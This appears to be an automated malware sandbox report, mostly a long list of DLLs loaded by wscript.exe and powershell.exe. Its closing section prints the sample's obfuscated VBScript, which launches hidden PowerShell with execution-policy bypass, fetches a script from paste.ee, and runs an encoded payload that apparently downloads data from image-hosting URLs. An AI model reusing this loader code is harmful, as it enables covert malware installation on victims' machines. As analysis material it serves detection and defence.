        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") zootomista = ("$saudavelmentealbuminatodigalbuminato = '") & anosidade & "'" zootomista = zootomista & ";$albuminatoWjuxd = [estofaryestofartmeridianom.Tmeridianoxt.meridianonsaudavelmenteoding]::Unisaudavelmenteodmeridiano.GmeridianotString(" zootomista = zootomista & "[estofaryestofar" zootomista = zootomista & "tmeridiano" zootomista = zootomista & "m.saudavelmentealbuminato" zootomista = zootomista & "nvmeridianor" zootomista = zootomista & "t]:" zootomista = zootomista & ":Fralbuminato" zootomista = zootomista & "mbaestofar" zootomista = zootomista & "meridiano64estofartring( $saudavelmente" zootomista = zootomista & "albuminatod" zootomista = zootomista & "igalbuminato.rmeridiano" zootomista = zootomista & "requestala" zootomista = zootomista & "saudavelmentemeridiano('" zootomista = zootomista & "DgTrmeridiano" zootomista = zootomista & "','" zootomista = zootomista & "A" zootomista = zootomista & "') ))" zootomista = zootomista & ";requestaalbuminatowerestofarhell.meridianoxmeridiano -windowestofartylmeridiano hiddmeridianon -meridianoxmeridianocutionrequestaolicy byrequestaasestofar -Norequestarofilmeridiano -command $OWjuxD" zootomista = Replace(zootomista,"requesta","p") zootomista = Replace(zootomista,"saudavelmente","c") zootomista = Replace(zootomista,"meridiano","e") zootomista = Replace(zootomista,"albuminato","o") zootomista = Replace(zootomista,"estofar","s") dissonante1 = "requestaalbuminatowerestofarhell -saudavelmentealbuminatommand " dissonante1 = Replace(dissonante1,"saudavelmente","c") dissonante1 = Replace(dissonante1,"estofar","s") dissonante1 = Replace(dissonante1,"albuminato","o") dissonante1 = Replace(dissonante1,"requesta","p") dissonante = dissonante1 & """" & zootomista & """" Cama.Run dissonante, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/c2iY1", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZ
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBz